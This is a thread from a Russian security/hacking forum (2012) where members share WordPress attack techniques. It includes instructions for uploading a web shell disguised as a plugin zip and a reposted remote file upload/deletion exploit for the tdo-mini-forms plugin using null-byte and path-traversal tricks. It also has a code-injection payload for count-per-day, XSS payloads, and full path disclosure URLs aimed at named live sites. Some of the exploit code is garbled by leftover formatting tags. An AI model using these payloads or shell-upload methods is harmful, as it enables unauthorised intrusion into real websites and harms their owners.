HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #261  
Старый 08.11.2012, 01:39
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
а можно хоть прмер или где про ето почитать?
Пакуем шелл в зип.

Например rss_class.php => rss_class.zip

Добавляем плагин, выбираем наш архив.

Готово.

/wp-content/plugins/rss_class/
 
Ответить с цитированием

  #262  
Старый 08.11.2012, 08:55
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Цитата:
Сообщение от z0mbyak  
z0mbyak said:
Скачай любой плагин для вп и закинь в архив свой шелл...
Через редактирование шаблонов измени шаб и залейся через wget например...
Через шаблоны не всегда удается залится, ибо могут быть урезаны права на запись.
 
Ответить с цитированием

  #263  
Старый 22.11.2012, 02:26
3ak.aT
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]wordpress tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms plugin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rfu[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]rfd[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Vulnerabilities



[/COLOR][COLOR="#007700"]------------------------------------------------------------

[/
COLOR][COLOR="#0000BB"]wordpress tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms plugin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]remote file upload[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]remote file deletion[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Vulnerabilities

Auther
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Cold z3ro[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]hackteach[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]org[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]s3curi7y[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com

Anonymous
[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]You are the man





[/COLOR][COLOR="#FF8000"]# Remote file upload :



[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]upload[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]inline[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=



[/COLOR][COLOR="#0000BB"]file extension[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg

uploaded path
[/COLOR][COLOR="#007700"]:

[/
COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$tdomf_form_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]$user_agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]IP[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg



Example to uploaded path
[/COLOR][COLOR="#007700"]:

[/
COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg







[/COLOR][COLOR="#FF8000"]# Remote file Deletion



[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]Note[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]useing Any http POST header modifier[/COLOR][COLOR="#007700"].



[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]deletefile[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]filepath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$varibale[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"])

[/
COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]NULL



Example to result
[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]upload[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]inline[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]deletefile[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]filepath[/COLOR][COLOR="#007700"]=../../../[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=



[/COLOR][COLOR="#0000BB"]Eof[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#FF8000"]# 1337day.com/exploit/19776 [2012-11-21]

[/COLOR][/COLOR
Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?
 
Ответить с цитированием

  #264  
Старый 05.12.2012, 01:42
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12174

Репутация: 7
По умолчанию

Нашел уязвимость в плагине wp, может кому-то будет полезная.

Wordpress "count-per-day v3.2.4" plugin PHP Code Execution

В админке в настройках плагина параметр "Последние счетчики - Дни:"

Код:
Code:
7);phpinfo(
Результат:

Код:
Code:
/wp-content/plugins/count-per-day/ajax.php?f=count&time=9999999999
 
Ответить с цитированием

  #265  
Старый 10.12.2012, 21:17
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

[+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS

[+] Found by Angel Injection

[+] Version: 1.3.11

Exploit:

Код:
Code:
http://localhost/?s=[xss here]&x=0&y=0
 
http://localhost/?s=">alert(1)&x=0&y=0
 
Ответить с цитированием

  #266  
Старый 17.12.2012, 20:06
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Wordpress 3.5 Active XSS


Нужны права администратора.


Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:

Код:
Code:
">alert('XSS Test')


Проверить можно тут.

Код:
Code:
L: test
P: test
(c) MaxFast aka n3m1s
 
Ответить с цитированием

  #267  
Старый 17.12.2012, 20:19
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

MaxFast, бага отработала под акком админа, под гостем идет экранирование.
 
Ответить с цитированием

  #268  
Старый 18.12.2012, 17:54
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Wordpress 3.5 Full Path Disclosure

Exploit:

Код:
Code:
localhost/?cat[]=1
Result:

Код:
Code:
Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735
Example:

Код:
Code:
_tpp://sergeybiryukov.ru/?cat[]=1
_ttp://wpsymposium.com/?cat[]=1
Found by MaxFast aka n3m1s
 
Ответить с цитированием

  #269  
Старый 20.12.2012, 01:07
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

[B]Wordpress Error - I can not get the source code for your site."[/COLOR]);

}

preg_match_all("| array given in (.*?)wp-includes|i",$source,$m);

foreach(
$m[1] as$match) {

echo
"".$match."";

}

}

?>



Wordpress 3.5 Full Path Disclosure Exploit | By n3m1s and zed0x



body { background-color: #111; color: #FFF; font-family: Verdana; font-size: 16px; }

input { background-color: #222; color: #FFF; font-family: Verdana; font-size: 16px; padding: 5px; border: 0px; }

.error { margin-top: 25px; color: red; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }

.result { margin-top: 25px; color: green; font-family: Verdana; font-size: 14px; background-color: #222; padding: 10px; text-align: center; }



Target:



URL not valid");

getCat($URL);

}

?>



[/COLOR]
[/PHP]
NOTICE: this exploit for web, do not forget about copyright!
 
Ответить с цитированием

  #270  
Старый 20.12.2012, 07:36
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Ребят, я всё понимаю "активность" и всё такое, но я не вижу смысла в эксплойте из одной строчки, максимум что делающего - раскрывающего пути. Да ещё только 1 метод представлен. Бред.

У меня к Вам предложение - впихините в код все известные методы раскрытия пути на WordPress - получите и от меня +, и от других форумчан спасибо.

В противном случае придётся удалить топик за ненадобностью. Согласитесь - кому захочется качать php exploit, копировать на тачку, запускать, когда просто можно сделать 1 простое дейсвтие в адресной строке даже по памяти ??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ